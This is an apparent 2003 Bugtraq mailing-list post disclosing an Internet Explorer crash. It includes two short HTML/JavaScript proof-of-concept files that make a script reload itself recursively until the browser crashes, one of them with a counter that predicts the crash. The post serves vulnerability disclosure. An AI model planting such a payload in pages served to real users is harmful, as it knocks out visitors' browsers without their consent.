[30633] in bugtraq
Internet Explorer Crash
daemon@ATHENA.MIT.EDU (Digital Scream)
Tue Jul 8 13:07:57 2003
Date: 7 Jul 2003 22:49:47 -0000
Message-ID: <20030707224947.25456.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Digital Scream <digitalscream@real.xakep.ru>
To: bugtraq@securityfocus.com
The following example, results in crash:
--------------------[Crash.html]--------------------
window.moveTo(screen.width,screen.height);
document.all.tags("script")[0].src="Crash.html";
//<script src="Crash.html"></script>
-----------------[End of Crash.html]----------------
The result is influenced with set of factors, amount of copies Internet
Explorer and symbols in the document.
In that specific case, there is an opportunity to foresee the moment of
crash. For example, if openly one window of Internet Explorer:
--------------------[Demo.html]--------------------
if(!window.counter)
{
window.counter=1;
alert("Internet Explorer will be crashed after 3-5 cycle");
}
window.counter++;
alert(window.counter);
document.all.tags("script")[0].src="demo.html";
//<script src="demo.html"></script>
-----------------[End of Demo.html]----------------
Grtz: UInC Team
